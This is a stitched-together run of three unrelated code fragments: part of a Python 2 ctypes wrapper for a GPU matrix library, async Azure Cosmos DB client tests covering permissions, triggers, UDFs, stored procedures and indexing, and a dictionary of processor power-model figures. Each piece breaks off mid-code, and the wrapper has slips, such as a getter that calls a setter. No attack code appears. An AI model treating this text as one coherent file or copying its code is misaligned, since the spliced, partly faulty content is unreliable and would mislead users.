_cudanet.convolution_back_weights.restype = ct.c_int
_cudanet.copy_transpose.restype = ct.c_int
_cudanet.max_pool.restype = ct.c_int
_cudanet.max_pool_undo.restype = ct.c_int
_cudanet.avg_pool.restype = ct.c_int
_cudanet.avg_pool_undo.restype = ct.c_int
_cudanet.l2_pool.restype = ct.c_int
_cudanet.l2_pool_undo.restype = ct.c_int
_cudanet.unpool_forward.restype = ct.c_int
_cudanet.unpool_backward.restype = ct.c_int
_cudanet.adadelta_update.restype = ct.c_int
_cudanet.xcov.restype = ct.c_int
_cudanet.mean_norm.restype = ct.c_int
_cudanet.crossmap_response_norm.restype = ct.c_int
_cudanet.crossmap_response_norm_undo.restype = ct.c_int
_cudanet.local_contrast_norm.restype = ct.c_int
_cudanet.local_contrast_norm_undo.restype = ct.c_int
_cudanet.get_gpu_pointer.restype = ct.c_ulong
_cudanet.get_device_id.restype = ct.c_int
_cudanet.set_device_id.restype = None
_cudanet.get_peer_access.restype = ct.c_int
_cudanet.get_data_device_id.restype = ct.c_int
_cudanet.randomize_gaussian.restype = ct.c_int
_cudanet.randomize_uniform.restype = ct.c_int
_cudanet.randomize_binary.restype = ct.c_int
_cudanet.add_noise_gaussian.restype = ct.c_int
_cudanet.add_noise_uniform.restype = ct.c_int
_cudanet.randomize_uniform_thresh.restype = ct.c_int
_cudanet.init_random.restype = None
_cudanet.init_random_no_seed.restype = None
_cudanet.destroy_random.restype = None
_cudanet.sync_stream.restype = None
_cudanet.softmax.restype = ct.c_int
_cudanet.softmax_grad.restype = ct.c_int
_cudanet.crossent_cost.restype = ct.c_int
_cudanet.crossent_cost_grad.restype = ct.c_int
_cudanet.get_gpu_pythonbuf.restype = ct.py_object
_cudanet.multi_ranked_error.restype = ct.c_int
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emmitted
when the function is used."""
def newFunc(*args, **kwargs):
warnings.warn("Call to deprecated function %s." % func.__name__,
category=DeprecationWarning)
return func(*args, **kwargs)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__dict__.update(func.__dict__)
return newFunc
class CUDANetException(Exception):
pass
def get_last_cuda_error():
return str(_cudanet.get_last_cuda_error())
def sync_stream():
"""
Sets the current deviceid context
"""
_cudanet.sync_stream()
def set_device_id(d):
"""
Sets the current deviceid context
"""
_cudanet.set_device_id(ct.c_int(d))
def get_device_id():
"""
Returns the current deviceid context
"""
return _cudanet.get_device_id()
def get_num_devices():
"""
Returns the current deviceid context
"""
err_code = ct.c_int(0)
numdev = _cudanet.get_num_devices(ct.byref(err_code))
if (err_code):
generate_exception(err_code)
return numdev
def get_peer_access(src, dest):
"""
Returns whether deviceid src to deviceid dest access available
"""
return _cudanet.set_peer_access(ct.c_int(src), ct.c_int(dest))
def generate_exception(err_code):
"""
Return a CUDANetException object based on the error code err_code.
"""
if err_code == -1:
return CUDANetException("Incompatible matrix dimensions.")
elif err_code == -2:
return CUDANetException("CUBLAS error.")
elif err_code == -3:
return CUDANetException("CUDA error: " + get_last_cuda_error())
elif err_code == -4:
return CUDANetException("Operation not supported on views.")
elif err_code == -5:
return CUDANetException("Operation not supported on transposed matrices.")
elif err_code == -6:
return CUDANetException("Invalid value")
elif err_code == -7:
return CUDANetException("Incompatible transposedness.")
elif err_code == -8:
return CUDANetException("Matrix is not in device memory.")
elif err_code == -9:
return CUDANetException("Operation not supported.")
elif err_code == -10:
return CUDANetException("Convolutional dimensions incorrect")
elif err_code == -11:
return CUDANetException("Convolution Number of filters must be multiple of 16.")
elif err_code == -12:
return CUDANetException("Invalid axis type")
elif err_code == -13:
return CUDANetException("Randomizer not initialized")
class NVMat(ct.Structure):
pass
class HostMat(ct.Structure):
pass
class _PY_BUFFER(ctypes.Structure):
_fields_ = [
("buf", ctypes.c_void_p),
("obj", ctypes.py_object),
("len", ctypes.c_ssize_t),
("itemsize", ctypes.c_ssize_t),
("readonly", ctypes.c_int),
("ndim", ctypes.c_int),
("format", ctypes.c_char_p),
("shape", ctypes.POINTER(ctypes.c_ssize_t)),
("strides", ctypes.POINTER(ctypes.c_ssize_t)),
("suboffsets", ctypes.POINTER(ctypes.c_ssize_t)),
("smalltable", ctypes.c_ssize_t * 2),
("internal", ctypes.c_void_p)
]
class cudanetmat(ct.Structure):
_fields_ = [('data_host', ct.POINTER(HostMat)),
('data_device', ct.POINTER(NVMat)),
('on_device', ct.c_int),
('on_host', ct.c_int),
('size', ct.c_int * 2),
('is_trans', ct.c_int),
('owns_data', ct.c_int)]
class rnd_struct(ct.Structure):
_fields_ = [('dev_rnd_mults', ct.POINTER(ct.c_uint)),
('dev_rnd_words', ct.POINTER(ct.c_longlong))]
class TransposedCUDAMatrix(object):
def __init__(self, mat):
self.mat = cudanetmat()
ct.memmove(ct.pointer(self.mat), ct.pointer(mat), ct.sizeof(self.mat))
self.mat.is_trans = 1
self.p_mat = ct.pointer(self.mat)
class CUDAMatrix(object):
"""
A CUDAMatrix object represents a matrix of single precision floating point
numbers on a GPU.
"""
def __init__(self, array, copy_to_device = True, copy_on_host = True):
"""
Initializes a new matrix object in one of two ways. If array is a numpy
ndarray, memory for a matrix with the same dimensions is allocated on
the GPU. If the copy_to_device flag is set to True, the GPU matrix is
initialized with the given ndarray. If the copy_on_host flag is set to
True, a copy of the matrix will be created in host memory even if the
matrix is of the correct type (float32, Fortran-contiguous order).
If array is not an ndarray, it must be a cudanetmat structure (typically
the user will never use this way of calling __init__).
"""
if type(array) in [np.ndarray, np.memmap]:
# Convert array to float32 in FORTRAN order
# array = reformat(array, copy = copy_on_host)
# Initialize as a ndarray-tied matrix.
self.mat = cudanetmat()
self.size = self.mat.size
self.p_mat = ct.pointer(self.mat)
self.numpy_array = array
_cudanet.init_from_array(self.p_mat, array.ctypes.data_as(ct.POINTER(ct.c_float)), ct.c_int(array.shape[0]), ct.c_int(array.shape[1]))
if copy_to_device:
err_code = _cudanet.copy_to_device(self.p_mat)
if err_code:
raise generate_exception(err_code)
else:
# Initialize based on existing cudamat structure.
mat = array
self.mat = mat
self.p_mat = ct.pointer(self.mat)
self.size = self.mat.size
self.T = TransposedCUDAMatrix(self.mat)
# Keep a reference to free device memory in case of a crash.
self.__free_device_memory = _cudanet.free_device_memory
def __del__(self):
try:
if 'p_mat' in self.__dict__:
err_code = self.__free_device_memory(self.p_mat)
if err_code:
raise generate_exception(err_code)
except AttributeError:
pass
@staticmethod
def init_random(seed = None):
pass
# """
# Initialize and seed the random number generator.
# """
# NUM_RND_STREAMS = 96*128
# CUDAMatrix.rndInitialized = 1
# CUDAMatrix.rnd_state = rnd_struct()
# CUDAMatrix.rnd_state_p = ct.pointer(CUDAMatrix.rnd_state)
# cudamat_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rnd_multipliers_32bit.txt')
# err_code = _cudanet.init_random(CUDAMatrix.rnd_state_p, ct.c_int(seed), cudamat_path)
# if err_code:
# raise generate_exception(err_code)
@property
def shape(self):
return (self.mat.size[0], self.mat.size[1])
def reshape(self, shape):
"""
Reshapes self to have the given shape. The number of elements cannot
change as this only changes how the contents are interpreted.
"""
m = ct.c_uint(shape[0])
n = ct.c_uint(shape[1])
# Reshape the default matrix
err_code = _cudanet.reshape(self.p_mat, m, n)
if err_code:
raise generate_exception(err_code)
# Reshape the transposed matrix
err_code = _cudanet.reshape(self.T.p_mat, m, n)
if err_code:
raise generate_exception(err_code)
# Reshape the CPU matrix
if self.mat.on_host:
self.numpy_array = np.reshape(self.numpy_array, shape, order='C')
return self
def asarray(self):
"""
Copies the matrix to an ndarray on the CPU and returns it.
"""
self.copy_to_host()
return self.numpy_array
def get_gpu_pointer(self):
"""
Return the gpu pointer
"""
return _cudanet.get_gpu_pointer(self.p_mat)
def get_data_device_id(self):
"""
Return the gpu pointer
"""
dev_id = _cudanet.get_data_device_id(self.p_mat)
# Error codes only for negative device ids
if (dev_id < 0):
raise generate_exception(dev_id)
else:
return dev_id
def copy_to_device(self):
"""
Copy the matrix to the GPU.
"""
err_code = _cudanet.copy_to_device(self.p_mat)
if err_code:
raise generate_exception(err_code)
def copy_to_host(self):
"""
Copy the matrix to the CPU.
"""
if not self.mat.on_host:
# allocate host storage if necessary
m = self.mat.size[0]
n = self.mat.size[1]
self.numpy_array = np.empty((m, n), dtype=np.float32, order = 'C')
_cudanet.set_host_mat(self.p_mat, self.numpy_array.ctypes.data_as(ct.POINTER(ct.c_float)))
self.mat.on_host = 1
err_code = _cudanet.copy_to_host(self.p_mat)
if err_code:
raise generate_exception(err_code)
def get_gpu_pythonbuf(self):
print "about to return the pybuf"
return _cudanet.get_gpu_pythonbuf(self.p_mat)
def _memoryView(self):
SHAPE = ctypes.c_ssize_t * 1
STRIDES = ctypes.c_ssize_t * 1
pybuffer = _PY_BUFFER()
pybuffer.buf = self.get_gpu_pointer()
pybuffer.obj = ctypes.py_object()
pybuffer.len = self.mat.size[0] * self.mat.size[1]
pybuffer.itemsize = 4
pybuffer.readonly = 0
pybuffer.ndim = 1
pybuffer.format = 'f'
pybuffer.shape = SHAPE(self.mat.size[0] * self.mat.size[1])
pybuffer.strides = STRIDES(1)
pybuffer.suboffsets = ctypes.POINTER(ctypes.c_ssize_t)()
pybuffer.smalltable[0] = 0
pybuffer.smalltable[1] = 0
pybuffer.internal = ctypes.c_void_p()
pythonapi.PyMemoryView_FromBuffer.argtypes = [ctypes.POINTER(_PY_BUFFER)]
pythonapi.PyMemoryView_FromBuffer.restype = ctypes.py_object
return pythonapi.PyMemoryView_FromBuffer(ctypes.byref(pybuffer))
def copy(self, include_host = False):
"""
Create a copy of the matrix on GPU. If include_host is True, also
creates a copy of the matrix on CPU if there was any.
"""
new_mat = empty(self.shape).assign(self)
if include_host and self.mat.on_host:
new_mat.numpy_array = self.numpy_array.copy()
_cudanet.set_host_mat(new_mat.p_mat, new_mat.numpy_array.ctypes.data_as(ct.POINTER(ct.c_float)))
new_mat.mat.on_host = 1
return new_mat
def copy_from(self, src, is_trans=False):
"""
Copy the source matrix from the host.
"""
_cudanet.copy_from(self.p_mat, src.ctypes.data_as(ct.POINTER(ct.c_float)), ct.c_bool(is_trans))
def assign(self, val):
"""Assign val to self, where val can be a scalar or a CUDAMatrix
with the same dimensions as self. """
if isinstance(val, CUDAMatrix):
err_code = _cudanet.copy_on_device(val.p_mat, self.p_mat)
elif isinstance(val, (np.int32, np.float32, int, float)):
err_code = _cudanet.assign_scalar(self.p_mat, ct.c_float(val))
else:
raise ValueError("Assigned value must be of type CUDAMatrix, int, or float.")
if err_code:
raise generate_exception(err_code)
return self
def set_host_mat(self, newbuf):
"""
For | |
read permissions and verify count remains the same
permissions = [permission async for permission in user.list_permissions()]
self.assertEqual(len(permissions), before_create_count)
async def test_authorization(self):
async def __SetupEntities(client):
"""
Sets up entities for this test.
:Parameters:
- `client`: cosmos_client_connection.CosmosClientConnection
:Returns:
dict
"""
# create database
db = self.databaseForTest
# create collection
collection = await db.create_container(
id='test_authorization' + str(uuid.uuid4()),
partition_key=PartitionKey(path='/id', kind='Hash')
)
# create document1
document = await collection.create_item(
body={'id': 'doc1',
'spam': 'eggs',
'key': 'value'},
)
# create user
user = await db.create_user(body={'id': 'user' + str(uuid.uuid4())})
# create permission for collection
permission = {
'id': 'permission On Coll',
'permissionMode': documents.PermissionMode.Read,
'resource': "dbs/" + db.id + "/colls/" + collection.id
}
permission_on_coll = await user.create_permission(body=permission)
self.assertIsNotNone(permission_on_coll.properties['_token'],
'permission token is invalid')
# create permission for document
permission = {
'id': 'permission On Doc',
'permissionMode': documents.PermissionMode.All,
'resource': "dbs/" + db.id + "/colls/" + collection.id + "/docs/" + document["id"]
}
permission_on_doc = await user.create_permission(body=permission)
self.assertIsNotNone(permission_on_doc.properties['_token'],
'permission token is invalid')
entities = {
'db': db,
'coll': collection,
'doc': document,
'user': user,
'permissionOnColl': permission_on_coll,
'permissionOnDoc': permission_on_doc,
}
return entities
# Client without any authorization will fail.
async with CosmosClient(CRUDTests.host, {}, consistency_level="Session", connection_policy=CRUDTests.connectionPolicy) as client:
try:
db_list = [db async for db in client.list_databases()]
except exceptions.CosmosHttpResponseError as e:
assert e.status_code == 401
# Client with master key.
async with CosmosClient(CRUDTests.host,
CRUDTests.masterKey,
consistency_level="Session",
connection_policy=CRUDTests.connectionPolicy) as client:
# setup entities
entities = await __SetupEntities(client)
resource_tokens = {"dbs/" + entities['db'].id + "/colls/" + entities['coll'].id:
entities['permissionOnColl'].properties['_token']}
async with CosmosClient(
CRUDTests.host, resource_tokens, consistency_level="Session", connection_policy=CRUDTests.connectionPolicy) as col_client:
db = entities['db']
old_client_connection = db.client_connection
db.client_connection = col_client.client_connection
# 1. Success-- Use Col Permission to Read
success_coll = db.get_container_client(container=entities['coll'])
# 2. Failure-- Use Col Permission to delete
await self.__AssertHTTPFailureWithStatus(StatusCodes.FORBIDDEN,
db.delete_container,
success_coll)
# 3. Success-- Use Col Permission to Read All Docs
success_documents = [document async for document in success_coll.read_all_items()]
self.assertTrue(success_documents != None,
'error reading documents')
self.assertEqual(len(success_documents),
1,
'Expected 1 Document to be succesfully read')
# 4. Success-- Use Col Permission to Read Doc
docId = entities['doc']['id']
success_doc = await success_coll.read_item(
item=docId,
partition_key=docId
)
self.assertTrue(success_doc != None, 'error reading document')
self.assertEqual(
success_doc['id'],
entities['doc']['id'],
'Expected to read children using parent permissions')
# 5. Failure-- Use Col Permission to Delete Doc
await self.__AssertHTTPFailureWithStatus(StatusCodes.FORBIDDEN,
success_coll.delete_item,
docId, docId)
resource_tokens = {"dbs/" + entities['db'].id + "/colls/" + entities['coll'].id + "/docs/" + docId:
entities['permissionOnDoc'].properties['_token']}
async with CosmosClient(
CRUDTests.host, resource_tokens, consistency_level="Session", connection_policy=CRUDTests.connectionPolicy) as doc_client:
# 6. Success-- Use Doc permission to read doc
read_doc = await doc_client.get_database_client(db.id).get_container_client(success_coll.id).read_item(docId, docId)
self.assertEqual(read_doc["id"], docId)
# 6. Success-- Use Doc permission to delete doc
await doc_client.get_database_client(db.id).get_container_client(success_coll.id).delete_item(docId, docId)
self.assertEqual(read_doc["id"], docId)
db.client_connection = old_client_connection
await db.delete_container(entities['coll'])
async def test_trigger_crud(self):
# create database
db = self.databaseForTest
# create collection
collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
# read triggers
triggers = [trigger async for trigger in collection.scripts.list_triggers()]
# create a trigger
before_create_triggers_count = len(triggers)
trigger_definition = {
'id': 'sample trigger',
'serverScript': 'function() {var x = 10;}',
'triggerType': documents.TriggerType.Pre,
'triggerOperation': documents.TriggerOperation.All
}
trigger = await collection.scripts.create_trigger(body=trigger_definition)
for property in trigger_definition:
if property != "serverScript":
self.assertEqual(
trigger[property],
trigger_definition[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(trigger['body'],
'function() {var x = 10;}')
# read triggers after creation
triggers = [trigger async for trigger in collection.scripts.list_triggers()]
self.assertEqual(len(triggers),
before_create_triggers_count + 1,
'create should increase the number of triggers')
# query triggers
triggers = [trigger async for trigger in collection.scripts.query_triggers(
query='SELECT * FROM root r WHERE r.id=@id',
parameters=[
{'name': '@id', 'value': trigger_definition['id']}
]
)]
self.assertTrue(triggers)
# replace trigger
change_trigger = trigger.copy()
trigger['body'] = 'function() {var x = 20;}'
replaced_trigger = await collection.scripts.replace_trigger(change_trigger['id'], trigger)
for property in trigger_definition:
if property != "serverScript":
self.assertEqual(
replaced_trigger[property],
trigger[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(replaced_trigger['body'],
'function() {var x = 20;}')
# read trigger
trigger = await collection.scripts.get_trigger(replaced_trigger['id'])
self.assertEqual(replaced_trigger['id'], trigger['id'])
# delete trigger
await collection.scripts.delete_trigger(replaced_trigger['id'])
# read triggers after deletion
await self.__AssertHTTPFailureWithStatus(StatusCodes.NOT_FOUND,
collection.scripts.delete_trigger,
replaced_trigger['id'])
async def test_udf_crud(self):
# create database
db = self.databaseForTest
# create collection
collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
# read udfs
udfs = [udf async for udf in collection.scripts.list_user_defined_functions()]
# create a udf
before_create_udfs_count = len(udfs)
udf_definition = {
'id': 'sample udf',
'body': 'function() {var x = 10;}'
}
udf = await collection.scripts.create_user_defined_function(body=udf_definition)
for property in udf_definition:
self.assertEqual(
udf[property],
udf_definition[property],
'property {property} should match'.format(property=property))
# read udfs after creation
udfs = [udf async for udf in collection.scripts.list_user_defined_functions()]
self.assertEqual(len(udfs),
before_create_udfs_count + 1,
'create should increase the number of udfs')
# query udfs
results = [udf async for udf in collection.scripts.query_user_defined_functions(
query='SELECT * FROM root r WHERE r.id=@id',
parameters=[
{'name': '@id', 'value': udf_definition['id']}
]
)]
self.assertTrue(results)
# replace udf
change_udf = udf.copy()
udf['body'] = 'function() {var x = 20;}'
replaced_udf = await collection.scripts.replace_user_defined_function(udf=udf['id'], body=udf)
for property in udf_definition:
self.assertEqual(
replaced_udf[property],
udf[property],
'property {property} should match'.format(property=property))
# read udf
udf = await collection.scripts.get_user_defined_function(replaced_udf['id'])
self.assertEqual(replaced_udf['id'], udf['id'])
# delete udf
await collection.scripts.delete_user_defined_function(replaced_udf['id'])
# read udfs after deletion
await self.__AssertHTTPFailureWithStatus(StatusCodes.NOT_FOUND,
collection.scripts.get_user_defined_function,
replaced_udf['id'])
async def test_sproc_crud(self):
# create database
db = self.databaseForTest
# create collection
collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
# read sprocs
sprocs = [sproc async for sproc in collection.scripts.list_stored_procedures()]
# create a sproc
before_create_sprocs_count = len(sprocs)
sproc_definition = {
'id': 'sample sproc',
'serverScript': 'function() {var x = 10;}'
}
sproc = await collection.scripts.create_stored_procedure(body=sproc_definition)
for property in sproc_definition:
if property != "serverScript":
self.assertEqual(
sproc[property],
sproc_definition[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(sproc['body'], 'function() {var x = 10;}')
# read sprocs after creation
sprocs = [sproc async for sproc in collection.scripts.list_stored_procedures()]
self.assertEqual(len(sprocs),
before_create_sprocs_count + 1,
'create should increase the number of sprocs')
# query sprocs
sprocs = [sproc async for sproc in collection.scripts.query_stored_procedures(
query='SELECT * FROM root r WHERE r.id=@id',
parameters=[
{'name': '@id', 'value': sproc_definition['id']}
]
)]
self.assertIsNotNone(sprocs)
# replace sproc
change_sproc = sproc.copy()
sproc['body'] = 'function() {var x = 20;}'
replaced_sproc = await collection.scripts.replace_stored_procedure(sproc=change_sproc['id'], body=sproc)
for property in sproc_definition:
if property != 'serverScript':
self.assertEqual(
replaced_sproc[property],
sproc[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(replaced_sproc['body'],
"function() {var x = 20;}")
# read sproc
sproc = await collection.scripts.get_stored_procedure(replaced_sproc['id'])
self.assertEqual(replaced_sproc['id'], sproc['id'])
# delete sproc
await collection.scripts.delete_stored_procedure(replaced_sproc['id'])
# read sprocs after deletion
await self.__AssertHTTPFailureWithStatus(StatusCodes.NOT_FOUND,
collection.scripts.get_stored_procedure,
replaced_sproc['id'])
async def test_script_logging_execute_stored_procedure(self):
created_db = self.databaseForTest
created_collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
sproc = {
'id': 'storedProcedure' + str(uuid.uuid4()),
'body': (
'function () {' +
' var mytext = \'x\';' +
' var myval = 1;' +
' try {' +
' console.log(\'The value of %s is %s.\', mytext, myval);' +
' getContext().getResponse().setBody(\'Success!\');' +
' }' +
' catch (err) {' +
' getContext().getResponse().setBody(\'inline err: [\' + err.number + \'] \' + err);' +
' }'
'}')
}
created_sproc = await created_collection.scripts.create_stored_procedure(body=sproc)
result = await created_collection.scripts.execute_stored_procedure(
sproc=created_sproc['id'],
partition_key=1
)
self.assertEqual(result, 'Success!')
self.assertFalse(
HttpHeaders.ScriptLogResults in created_collection.scripts.client_connection.last_response_headers)
result = await created_collection.scripts.execute_stored_procedure(
sproc=created_sproc['id'],
enable_script_logging=True,
partition_key=1
)
self.assertEqual(result, 'Success!')
self.assertEqual(urllib.quote('The value of x is 1.'),
created_collection.scripts.client_connection.last_response_headers.get(
HttpHeaders.ScriptLogResults))
result = await created_collection.scripts.execute_stored_procedure(
sproc=created_sproc['id'],
enable_script_logging=False,
partition_key=1
)
self.assertEqual(result, 'Success!')
self.assertFalse(
HttpHeaders.ScriptLogResults in created_collection.scripts.client_connection.last_response_headers)
async def test_collection_indexing_policy(self):
# create database
db = self.databaseForTest
# create collection
collection = await db.create_container(
id='test_collection_indexing_policy default policy' + str(uuid.uuid4()),
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties = await collection.read()
self.assertEqual(collection_properties['indexingPolicy']['indexingMode'],
documents.IndexingMode.Consistent,
'default indexing mode should be consistent')
await db.delete_container(container=collection)
consistent_collection = await db.create_container(
id='test_collection_indexing_policy consistent collection ' + str(uuid.uuid4()),
indexing_policy={
'indexingMode': documents.IndexingMode.Consistent
},
partition_key=PartitionKey(path='/id', kind='Hash')
)
consistent_collection_properties = await consistent_collection.read()
self.assertEqual(consistent_collection_properties['indexingPolicy']['indexingMode'],
documents.IndexingMode.Consistent,
'indexing mode should be consistent')
await db.delete_container(container=consistent_collection)
collection_with_indexing_policy = await db.create_container(
id='CollectionWithIndexingPolicy ' + str(uuid.uuid4()),
indexing_policy={
'automatic': True,
'indexingMode': documents.IndexingMode.Consistent,
'includedPaths': [
{
'path': '/',
'indexes': [
{
'kind': documents.IndexKind.Hash,
'dataType': documents.DataType.Number,
'precision': 2
}
]
}
],
'excludedPaths': [
{
'path': '/"systemMetadata"/*'
}
]
},
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_with_indexing_policy_properties = await collection_with_indexing_policy.read()
self.assertEqual(1,
len(collection_with_indexing_policy_properties['indexingPolicy']['includedPaths']),
'Unexpected includedPaths length')
self.assertEqual(2,
len(collection_with_indexing_policy_properties['indexingPolicy']['excludedPaths']),
'Unexpected excluded path count')
await db.delete_container(container=collection_with_indexing_policy)
async def test_create_default_indexing_policy(self):
# create database
db = self.databaseForTest
# no indexing policy specified
collection = await db.create_container(
id='test_create_default_indexing_policy TestCreateDefaultPolicy01' + str(uuid.uuid4()),
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties = await collection.read()
await self._check_default_indexing_policy_paths(collection_properties['indexingPolicy'])
await db.delete_container(container=collection)
# partial policy specified
collection = await db.create_container(
id='test_create_default_indexing_policy TestCreateDefaultPolicy01' + str(uuid.uuid4()),
indexing_policy={
'indexingMode': documents.IndexingMode.Consistent, 'automatic': True
},
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties = await collection.read()
await self._check_default_indexing_policy_paths(collection_properties['indexingPolicy'])
await db.delete_container(container=collection)
# default policy
collection = await db.create_container(
id='test_create_default_indexing_policy TestCreateDefaultPolicy03' + str(uuid.uuid4()),
indexing_policy={},
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties | |
0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.248406,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.52292,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0237353,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221331,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.128895,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.111703,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.180173,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.090945,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.38282,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.107994,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.26079,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0243511,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00468532,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0427376,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0346508,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0670886,
'Execution Unit/Register Files/Runtime Dynamic': 0.0393361,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0959712,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.241133,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.29,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
